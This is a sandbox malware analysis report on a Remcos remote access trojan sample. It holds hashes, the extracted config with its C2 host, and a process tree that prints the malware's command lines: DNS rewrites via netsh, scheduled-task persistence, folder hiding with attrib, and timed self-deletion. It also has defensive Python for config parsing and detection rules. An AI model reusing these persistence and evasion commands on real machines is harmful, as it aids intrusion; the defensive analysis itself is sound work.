Analysis
- max time kernel: 150s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 17-10-2022 14:41
- Static task: static1
- Behavioral task: behavioral1
- Sample: 5051c71e2b1b319a14474b47876403e4.exe
- Resource: win7-20220812-en
General
- Target: 5051c71e2b1b319a14474b47876403e4.exe
- Size: 2.2MB
- MD5: 5051c71e2b1b319a14474b47876403e4
- SHA1: 3684e802d6831d76da44d53cef16939916976b94
- SHA256: efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1
- SHA512: 8aaaa2ed847f452972d36854925e6043fba389f8a8852aad02c10e67d6fc2b0baac5548b48762d522cac4d8980a98170097281fc175f06ff2387c5fdb13b3636
- SSDEEP: 24576:WN9ewmMdH+HY530osWnYQb6VOKs4zm2evT:I
Malware Config
Extracted
- Family: remcos
- 220928 (second line of the extracted block; the report does not label this field)
- C2 host:port: minecraftrpgserver.com:80
- audio_folder: MicRecords
- audio_record_time: 5
- connect_delay: 0
- connect_interval: 1
- copy_file: software_reporter_tool.exe
- copy_folder: Google
- delete_file: true
- hide_file: false
- hide_keylog_file: false
- install_flag: false
- keylog_crypt: true
- keylog_file: adbkey.dat
- keylog_flag: false
- keylog_path: %Temp%
- mouse_option: false
- mutex: 9416a517bdcd8521-8QM7X6
- screenshot_crypt: true
- screenshot_flag: true
- screenshot_folder: Google
- screenshot_path: %Temp%
- screenshot_time: 60
- startup_value: Google
- take_screenshot_option: false
- take_screenshot_time: 5

Reading note: keylog_flag and install_flag are false while screenshot_flag is true (one capture every 60 seconds, stored encrypted), so the host indicators to carry forward from this block are the mutex, the screenshot location under %Temp%, and the file/folder names Google and software_reporter_tool.exe; the network indicator is minecraftrpgserver.com on TCP port 80.
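As an added example (not part of the sandbox report and not Remcos or sandbox code), the following Python parses the flattened config block exactly as it is printed above into a dict and derives the indicators a responder would hunt for, listing an artifact only when the feature flag that produces it is on. It assumes the layout shown here: family line, an unlabeled tag line, one or more host:port lines, then `-`-separated key/value pairs (reading several C2 lines is an assumed generalisation; this report has one). Joining `keylog_path` with `keylog_file`, `screenshot_path` with `screenshot_folder`, and `copy_folder` with `copy_file` into on-disk paths is an assumption about how those fields relate, not something the report states. The sample text is the report's own block, abridged to the fields the code uses.

```python
import re

# Sample input: the report's Malware Config block, abridged to the fields used
# below (same one-item-per-line layout, "-" between pairs).
REPORT_CONFIG = """\
remcos
220928
minecraftrpgserver.com:80
-
copy_file
software_reporter_tool.exe
-
copy_folder
Google
-
install_flag
false
-
keylog_file
adbkey.dat
-
keylog_flag
false
-
keylog_path
%Temp%
-
mutex
9416a517bdcd8521-8QM7X6
-
screenshot_flag
true
-
screenshot_folder
Google
-
screenshot_path
%Temp%
-
screenshot_time
60
"""


def _coerce(value):
    """Booleans and integers as the sandbox prints them; anything else stays a string."""
    if value in ("true", "false"):
        return value == "true"
    if re.fullmatch(r"-?\d+", value):
        return int(value)
    return value


def parse_remcos_config(text):
    """Return {"family", "tag", "c2": [{"host", "port"}], "settings": {...}}."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    family, tag = lines[0], lines[1]
    c2, i = [], 2
    while i < len(lines) and lines[i] != "-":   # assumption: several host:port lines may follow
        host, sep, port = lines[i].rpartition(":")
        if not sep or not port.isdigit():
            raise ValueError(f"malformed C2 entry: {lines[i]!r}")
        c2.append({"host": host, "port": int(port)})
        i += 1
    pairs = [ln for ln in lines[i:] if ln != "-"]
    if len(pairs) % 2:
        raise ValueError("dangling key without a value")
    settings = {k: _coerce(v) for k, v in zip(pairs[::2], pairs[1::2])}
    return {"family": family, "tag": tag, "c2": c2, "settings": settings}


def indicators(cfg):
    """Indicators implied by the parsed flags. A disabled feature contributes no
    file path, so responders are not sent after a file that is never written."""
    s = cfg["settings"]
    ioc = {"network": [f"{c['host']}:{c['port']}" for c in cfg["c2"]],
           "mutex": s.get("mutex"), "files": [], "capabilities": []}
    if s.get("keylog_flag"):        # path joins below are an assumption about the fields
        ioc["files"].append(f"{s['keylog_path']}\\{s['keylog_file']}")
        ioc["capabilities"].append("keylogger")
    if s.get("screenshot_flag"):
        ioc["files"].append(f"{s['screenshot_path']}\\{s['screenshot_folder']}")
        ioc["capabilities"].append(f"screenshots every {s['screenshot_time']}s")
    if s.get("install_flag"):
        ioc["files"].append(f"{s['copy_folder']}\\{s['copy_file']}")
        ioc["capabilities"].append("self-install")
    return ioc


if __name__ == "__main__":
    print(indicators(parse_remcos_config(REPORT_CONFIG)))
```

For this sample the result names only the screenshot folder under %Temp% and the C2 endpoint; the keylog file adbkey.dat and the software_reporter_tool.exe copy are left out because their flags are off, which is the point of gating on the flags rather than dumping every path in the config.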
Signatures
- Executes dropped EXE (5 IoCs)
  Processes: 1248 InstallUtil.exe; 1748 unzip.exe; 808 unzip.exe; 1964 unzip.exe; 836 unzip.exe
- Loads dropped DLL (2 IoCs)
  Processes: 988 InstallUtil.exe (two loads)
- Drops file in System32 directory (4 IoCs)
  File opened for modification by unzip.exe (once per unzip.exe instance): C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
  Caveat: the touch of the Windows PowerShell shortcut, the `-enc` switch on three of the unzip.exe command lines, and the `;`-separated `cmd.exe /c` statements on the fourth are consistent with unzip.exe being a renamed PowerShell host; the report itself does not identify the binary, so treat that as an inference to confirm from the file (see its hashes under Downloads).
- Suspicious use of SetThreadContext (1 IoC)
  PID 1944 (5051c71e2b1b319a14474b47876403e4.exe) set thread context of PID 988 (InstallUtil.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic note is "Likely ransomware behaviour"; for this sample the extracted config identifies Remcos, a remote access tool, so read this as drive enumeration rather than evidence of encryption.
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: 1944 5051c71e2b1b319a14474b47876403e4.exe (x2); 1248 InstallUtil.exe (x2); 1964 unzip.exe; 808 unzip.exe; 1748 unzip.exe; 836 unzip.exe
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Token SeDebugPrivilege: 1944 5051c71e2b1b319a14474b47876403e4.exe; 1248 InstallUtil.exe; 1964 unzip.exe; 836 unzip.exe; 808 unzip.exe; 1748 unzip.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes: 988 InstallUtil.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Write edges (source PID/image -> target PID/image, number of writes); the report's list is capped at 64 entries:
  1944 5051c71e2b1b319a14474b47876403e4.exe -> 988 InstallUtil.exe (16)
  988 InstallUtil.exe -> 1248 InstallUtil.exe (4)
  1648 cmd.exe -> 1592 choice.exe (3)
  1748 unzip.exe -> 1776 cmd.exe (4)
  1776 cmd.exe -> 336 netsh.exe (4)
  1748 unzip.exe -> 1544 cmd.exe (4)
  1544 cmd.exe -> 1440 netsh.exe (4)
  836 unzip.exe -> 1592 cmd.exe (4)
  1592 cmd.exe -> 1648 schtasks.exe (4)
  836 unzip.exe -> 1196 cmd.exe (4)
  836 unzip.exe -> 1148 cmd.exe (4)
  1148 cmd.exe -> 1728 attrib.exe (4)
  1964 unzip.exe -> 2012 cmd.exe (4)
  1964 unzip.exe -> 824 cmd.exe (1)
  Note that PIDs 1592 and 1648 each appear as two different processes (choice.exe/cmd.exe and cmd.exe/schtasks.exe): Windows reused the numbers during the run.
- Views/modifies file attributes (1 TTP, 1 IoC)
Processes
PIDs in parentheses are taken from the signature section above (SetThreadContext and WriteProcessMemory edges); processes the report does not tie to a PID are left without one. Indentation follows the report's depth markers (1, 2, 3). Because PIDs 1592 and 1648 are reused, the 64-bit cmd.exe/choice.exe pair at the end and the cmd.exe/schtasks.exe pair under the fourth unzip.exe are different processes that share numbers.

1  C:\Users\Admin\AppData\Local\Temp\5051c71e2b1b319a14474b47876403e4.exe  (PID 1944)
   cmd: "C:\Users\Admin\AppData\Local\Temp\5051c71e2b1b319a14474b47876403e4.exe"
   - Suspicious use of SetThreadContext
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  (PID 988; SetThreadContext target of 1944, launched with no assembly argument)
     cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
     - Loads dropped DLL
     - Suspicious use of SetWindowsHookEx
     - Suspicious use of WriteProcessMemory
    3  C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe  (PID 1248; the dropped 35KB file under Downloads, which reuses the InstallUtil name)
       cmd: "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
       - Executes dropped EXE
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken

1  C:\ProgramData\Google\unzip.exe  (PID 1748)
   cmd: "C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
   - Executes dropped EXE
   - Drops file in System32 directory
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\SysWOW64\cmd.exe  (PID 1776)
     cmd: "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\SysWOW64\netsh.exe  (PID 336)
       cmd: netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
  2  C:\Windows\SysWOW64\cmd.exe  (PID 1544)
     cmd: "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\SysWOW64\netsh.exe  (PID 1440)
       cmd: netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2

1  C:\ProgramData\Google\unzip.exe  (PID 808; the only unzip.exe instance without a WriteProcessMemory edge, and the only one shown without children)
   cmd: "C:\ProgramData\Google\unzip.exe" -enc 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
   - Executes dropped EXE
   - Drops file in System32 directory
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken

1  C:\ProgramData\Google\unzip.exe  (PID 1964)
   cmd: "C:\ProgramData\Google\unzip.exe" -enc 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
   - Executes dropped EXE
   - Drops file in System32 directory
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\SysWOW64\cmd.exe
     cmd: "C:\Windows\system32\cmd.exe" /c C:\ProgramData\Google\7z.exe x -oC:\ProgramData\Google\ C:\ProgramData\Google\InstallUtil.png -px -y
  2  C:\Windows\SysWOW64\cmd.exe
     cmd: "C:\Windows\system32\cmd.exe" /c choice /c y /n /d y /t 3 & del C:\ProgramData\Google\InstallUtil.exe
    3  C:\Windows\SysWOW64\choice.exe
       cmd: choice /c y /n /d y /t 3
  2  C:\Windows\SysWOW64\cmd.exe
     cmd: "C:\Windows\system32\cmd.exe" /c choice /c y /n /d y /t 3 & del C:\Windows\Temp\KB4087642.hta
    3  C:\Windows\SysWOW64\choice.exe
       cmd: choice /c y /n /d y /t 3

1  C:\ProgramData\Google\unzip.exe  (PID 836)
   cmd: "C:\ProgramData\Google\unzip.exe" -enc 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
   - Executes dropped EXE
   - Drops file in System32 directory
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\SysWOW64\cmd.exe  (PID 1592)
     cmd: "C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\SysWOW64\schtasks.exe  (PID 1648)
       cmd: schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f
       - Creates scheduled task(s)
  2  C:\Windows\SysWOW64\cmd.exe  (PID 1196)
     cmd: "C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml
  2  C:\Windows\SysWOW64\cmd.exe  (PID 1148)
     cmd: "C:\Windows\system32\cmd.exe" /c attrib +h +S C:\ProgramData\Google
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\SysWOW64\attrib.exe  (PID 1728)
       cmd: attrib +h +S C:\ProgramData\Google
       - Views/modifies file attributes

1  C:\Windows\System32\cmd.exe  (PID 1648; a 64-bit cmd.exe whose parent the report does not show)
   cmd: "C:\Windows\System32\cmd.exe" /c choice /c y /n /d y & Del "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\system32\choice.exe  (PID 1592)
     cmd: choice /c y /n /d y
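The tree above is a chain of living-off-the-land steps: a framework InstallUtil.exe started with no assembly argument and then written into by the sample, netsh rewriting the adapter's DNS servers, schtasks importing a task definition from C:\Windows\Temp, `choice ... & del` used as a timed self-delete, attrib hiding the ProgramData drop folder, and a `-enc` switch on a binary living in ProgramData. As an added example (not the sandbox's own detection logic), the Python below encodes each of those as a rule and runs them over process-creation events. The events are constructed from the command lines in the tree; PIDs and parent chains are filled in only where the signature section pins them down (0 or empty otherwise), the `-enc` argument is a placeholder for the value the report elides, and the benign `netsh ... show config` event is invented as a control that must not fire.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str             # full path of the executable
    cmdline: str
    ancestors: tuple = ()  # parent, grandparent, ... image paths (nearest first)


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _under(path, *prefixes):
    return any(path.lower().startswith(p.lower()) for p in prefixes)


def _has(ev, pattern):
    return re.search(pattern, ev.cmdline, re.I) is not None


def _arg_count(cmdline):
    """Tokens after the (possibly quoted) image path."""
    m = re.match(r'^\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline)
    return len(m.group(1).split()) if m else 0


def _dns_change(ev):
    return _base(ev.image) == "netsh.exe" and _has(ev, r"interface\s+ipv4\s+(set|add)\s+dns")


USER_WRITABLE = ("C:\\ProgramData\\", "C:\\Users\\")
FRAMEWORK = "C:\\Windows\\Microsoft.NET\\"

# (rule name, predicate). Each predicate encodes one behaviour from the process tree.
RULES = [
    ("netsh_dns_change", _dns_change),
    # the same netsh call is routine from an admin console; the loader's tell is an
    # ancestor that lives in ProgramData or a user profile
    ("netsh_dns_change_from_user_writable_ancestor",
     lambda ev: _dns_change(ev) and any(_under(a, *USER_WRITABLE) for a in ev.ancestors)),
    ("schtasks_xml_from_temp",
     lambda ev: _base(ev.image) == "schtasks.exe" and _has(ev, r"/create\b.*?/xml\s+\S*\\temp\\")),
    # "choice /c y /n /d y [/t N] & del <file>": a delay without sleep.exe, then deletion
    ("choice_delay_then_del",
     lambda ev: _base(ev.image) == "cmd.exe" and _has(ev, r"choice\s+/c\s+y\s+/n\s+/d\s+y.*&\s*del\b")),
    ("attrib_hide_system_programdata",
     lambda ev: _base(ev.image) == "attrib.exe" and _has(ev, r"\+[hs]\s+\+[hs]\s+\S*\\ProgramData\\")),
    # a PowerShell-style -enc switch on a binary that does not live under C:\Windows
    ("encoded_command_outside_windows",
     lambda ev: not _under(ev.image, "C:\\Windows\\") and _has(ev, r"(^|\s)-enc(odedcommand)?\b")),
    # the real InstallUtil.exe needs an assembly path; an argument-less launch is a hollowing host
    ("installutil_without_assembly",
     lambda ev: _base(ev.image) == "installutil.exe" and _under(ev.image, FRAMEWORK)
     and _arg_count(ev.cmdline) == 0),
    ("installutil_copy_outside_framework",
     lambda ev: _base(ev.image) == "installutil.exe" and not _under(ev.image, FRAMEWORK)),
]


def triage(events):
    """pid -> names of the rules that fired, in RULES order; clean events are omitted."""
    hits = {}
    for ev in events:
        fired = [name for name, pred in RULES if pred(ev)]
        if fired:
            hits[ev.pid] = fired
    return hits


# Constructed sample events: command lines copied from the tree above; PIDs and ancestors
# only where the signature section ties them down, else 0 / empty.
_UNZIP = "C:\\ProgramData\\Google\\unzip.exe"
_CMD32 = "C:\\Windows\\SysWOW64\\cmd.exe"
_SAMPLE = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5051c71e2b1b319a14474b47876403e4.exe"
_FX_INSTALLUTIL = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"
EVENTS = [
    ProcEvent(988, _FX_INSTALLUTIL, _FX_INSTALLUTIL, (_SAMPLE,)),
    ProcEvent(1248, "C:\\Users\\Admin\\AppData\\Local\\Temp\\InstallUtil.exe",
              '"C:\\Users\\Admin\\AppData\\Local\\Temp\\InstallUtil.exe"', (_FX_INSTALLUTIL,)),
    ProcEvent(336, "C:\\Windows\\SysWOW64\\netsh.exe",
              "netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8", (_CMD32, _UNZIP)),
    ProcEvent(1648, "C:\\Windows\\SysWOW64\\schtasks.exe",
              "schtasks /create /xml C:\\Windows\\Temp\\.xml /tn GoogleUpdateTask /f", (_CMD32, _UNZIP)),
    ProcEvent(0, _CMD32,
              '"C:\\Windows\\system32\\cmd.exe" /c choice /c y /n /d y /t 3 & del C:\\Windows\\Temp\\KB4087642.hta',
              (_UNZIP,)),
    ProcEvent(1728, "C:\\Windows\\SysWOW64\\attrib.exe", "attrib +h +S C:\\ProgramData\\Google", (_CMD32, _UNZIP)),
    ProcEvent(808, _UNZIP, f'"{_UNZIP}" -enc <BASE64-ELIDED-IN-REPORT>', ()),
    # benign control (constructed): an admin inspecting DNS from an ordinary console
    ProcEvent(4242, "C:\\Windows\\System32\\netsh.exe", "netsh interface ipv4 show config",
              ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\explorer.exe")),
]

if __name__ == "__main__":
    for pid, names in triage(EVENTS).items():
        print(pid, ", ".join(names))
```

The two-tier DNS rule is the part worth copying: a bare `netsh interface ipv4 set dns` alert is noisy on managed fleets, while the same call with a ProgramData or user-profile ancestor is close to a sure thing. The `choice` rule also matches the `& Del` variant without `/t` that the 64-bit cmd.exe at the bottom of the tree uses.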
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\Google\unzip.exe (four identical entries in the report)
  Filesize: 442KB
  MD5: 92f44e405db16ac55d97e3bfe3b132fa
  SHA1: 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
  SHA256: 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
  SHA512: f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
- C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe (four identical entries, two of them listed as \Users\Admin\AppData\Local\Temp\InstallUtil.exe without the drive letter)
  Filesize: 35KB
  MD5: e98d234b604ff7176fbef3ad53d0c52a
  SHA1: ea5afe92242146a39ecdd30c0d5add621ab92e78
  SHA256: 01245c0e4e55638082471bcc3091109cd3bb6ae0665e4f7e17488d54a04fba02
  SHA512: 274da7ec82c668efc68f0ab8277fa83c23f7f60ad1e668821360803e03bd6db468ad6aec8fa40cb4775b729db03af340f894b947e84eedd6cbe5987c49823235
Memory dumps
(mapping.dmp entries carry only an address; memory.dmp entries carry a region and its size)
- memory/336-95: mapping at 0x0000000000000000
- memory/808-90, 808-101: 0x000000006EE40000-0x000000006F3EB000, 5.7MB
- memory/824-112: mapping at 0x0000000000000000
- memory/836-91, 836-103, 836-110: 0x000000006EE40000-0x000000006F3EB000, 5.7MB
- memory/936-114: mapping at 0x0000000000000000
- memory/988-70: mapping at 0x00000000004327A4
- memory/988-58, 988-59, 988-61, 988-63, 988-64, 988-65, 988-66, 988-67, 988-69, 988-73, 988-74, 988-102: 0x0000000000400000-0x000000000047B000, 492KB (twelve dumps of the same region)
- memory/1148-108: mapping at 0x0000000000000000
- memory/1176-113: mapping at 0x0000000000000000
- memory/1196-107: mapping at 0x0000000000000000
- memory/1248-77: mapping at 0x0000000000000000
- memory/1248-80: 0x0000000000120000-0x0000000000130000, 64KB
- memory/1440-98: mapping at 0x0000000000000000
- memory/1544-97: mapping at 0x0000000000000000
- memory/1592-89, 1592-105: mapping at 0x0000000000000000
- memory/1648-106: mapping at 0x0000000000000000
- memory/1728-109: mapping at 0x0000000000000000
- memory/1748-93, 1748-100: 0x000000006EE40000-0x000000006F3EB000, 5.7MB
- memory/1776-94, 1776-115: mapping at 0x0000000000000000
- memory/1944-54: 0x00000000012A0000-0x00000000014CE000, 2.2MB
- memory/1944-55: 0x0000000075CF1000-0x0000000075CF3000, 8KB
- memory/1944-56: 0x00000000052A0000-0x00000000053BA000, 1.1MB
- memory/1944-57: 0x0000000008630000-0x00000000086C2000, 584KB
- memory/1964-92, 1964-104, 1964-116: 0x000000006EE40000-0x000000006F3EB000, 5.7MB
- memory/2012-111: mapping at 0x0000000000000000

Reading note (an inference from the entries above, not a statement by the sandbox): PID 988 is the only process whose mapping address is non-zero, and 0x4327A4 falls inside the 0x400000-0x47B000 region dumped twelve times for that PID; together with the SetThreadContext entry (1944 -> 988) this is the pattern of an image written into a suspended InstallUtil.exe with its thread pointed at the new code, so the 492KB dumps, not the on-disk InstallUtil.exe, are where to look for the next-stage payload. The 2.2MB region in PID 1944 matches the sample's own file size, and the same 5.7MB region 0x6EE40000-0x6F3EB000 appears in all four unzip.exe instances.